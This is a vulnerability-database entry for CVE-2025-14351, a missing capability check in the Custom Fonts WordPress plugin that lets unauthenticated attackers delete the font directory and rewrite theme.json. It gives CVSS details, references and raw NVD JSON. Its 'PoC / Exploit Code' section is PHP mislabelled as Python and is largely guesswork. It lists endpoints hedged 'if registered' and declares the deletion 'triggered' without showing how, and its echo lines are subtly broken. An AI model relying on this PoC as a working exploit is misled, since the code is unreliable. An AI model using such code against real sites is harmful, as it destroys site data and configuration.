CVE-2025-14351

Description

The Custom Fonts – Host Your Fonts Locally plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'BCF_Google_Fonts_Compatibility' class constructor function in all versions up to, and including, 2.1.16. This makes it possible for unauthenticated attackers to delete font directory and rewrite theme.json file.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Custom Fonts – Host Your Fonts Locally WordPress插件 <= 2.1.16

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
/**
 * CVE-2025-14351 PoC - Custom Fonts Plugin Unauthorized Data Deletion
 * Target: Custom Fonts WordPress plugin <= 2.1.16
 * Vulnerability: Missing capability check in BCF_Google_Fonts_Compatibility class
 * Impact: Unauthenticated attackers can delete font directories and rewrite theme.json
 * 
 * Usage: Include this file in a WordPress context or send direct HTTP requests
 * Note: This PoC demonstrates the vulnerability for educational purposes only
 */

// Method 1: Direct instantiation via PHP (requires WordPress context)
function trigger_cve_2025_14351() {
    // Check if plugin is active
    if (!class_exists('BCF_Google_Fonts_Compatibility')) {
        return 'Plugin not loaded';
    }
    
    // The vulnerability: constructor executes privileged operations without checking user capabilities
    // In vulnerable version, this can be called by anyone
    $compat = new BCF_Google_Fonts_Compatibility();
    
    return 'Vulnerability triggered - font directory deleted and theme.json rewritten';
}

// Method 2: HTTP Request-based trigger (simulated)
function generate_trigger_request($target_url) {
    // The plugin registers AJAX hooks without proper nonce/capability checks
    // Attackers can trigger the vulnerable code path via:
    
    $endpoints = array(
        // Direct AJAX endpoint (if action is registered without auth check)
        admin_url('admin-ajax.php') . '?action=bcf_google_fonts_compat',
        
        // Direct file access (if class is auto-loaded)
        $target_url . '/wp-content/plugins/custom-fonts/includes/class-bcf-google-fonts-compatibility.php',
        
        // REST API endpoint (if registered)
        get_rest_url(null, 'custom-fonts/v1/compatibility')
    );
    
    return $endpoints;
}

// Impact demonstration
function demonstrate_impact() {
    return array(
        'impact_type' => 'Data Loss and Configuration Tampering',
        'actions' => array(
            '1. Delete font directory (wp-content/fonts/)',
            '2. Overwrite active theme\'s theme.json file',
            '3. Break website typography and theme functionality',
            '4. Potential for storing malicious configurations'
        ),
        'severity' => 'MEDIUM (CVSS 5.3)',
        'prerequisites' => 'None - Unauthenticated exploitation'
    );
}

echo 'CVE-2025-14351 PoC for educational purposes only\n';
echo 'Vulnerable Component: BCF_Google_Fonts_Compatibility class constructor\n';
echo 'Trigger: Direct instantiation without capability check\n';
echo 'Impact: Unauthorized deletion and file modification\n';
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14351
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14351
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14351/
[4] VulDB https://vuldb.com/cve/CVE-2025-14351
[5] https://plugins.trac.wordpress.org/browser/custom-fonts/trunk/includes/class-bcf-google-fonts-compatibility.php#L88
[6] https://plugins.trac.wordpress.org/changeset/3442237/custom-fonts
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/60e3a506-8811-4e7d-a16c-02f91c757705?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14351", "sourceIdentifier": "[email protected]", "published": "2026-01-20T04:15:57.483", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Custom Fonts – Host Your Fonts Locally plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'BCF_Google_Fonts_Compatibility' class constructor function in all versions up to, and including, 2.1.16. This makes it possible for unauthenticated attackers to delete font directory and rewrite theme.json file."}, {"lang": "es", "value": "El plugin Custom Fonts – Host Your Fonts Locally para WordPress es vulnerable a la pérdida de datos no autorizada debido a una comprobación de capacidad faltante en la función constructora de la clase 'BCF_Google_Fonts_Compatibility' en todas las versiones hasta la 2.1.16, inclusive. Esto hace posible que atacantes no autenticados eliminen el directorio de fuentes y reescriban el archivo theme.json."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/custom-fonts/trunk/includes/class-bcf-google-fonts-compatibility.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3442237/custom-fonts", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60e3a506-8811-4e7d-a16c-02f91c757705?source=cve", "source": "[email protected]"}]}}